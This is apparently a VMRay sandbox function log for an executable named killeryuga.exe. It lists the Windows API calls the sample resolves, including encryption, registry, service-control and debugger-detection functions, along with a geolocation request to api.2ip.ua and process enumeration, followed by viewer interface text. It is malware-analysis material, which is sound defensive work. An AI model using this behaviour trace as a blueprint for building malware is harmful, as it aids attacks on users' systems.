Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:39:12 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 15773662834 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image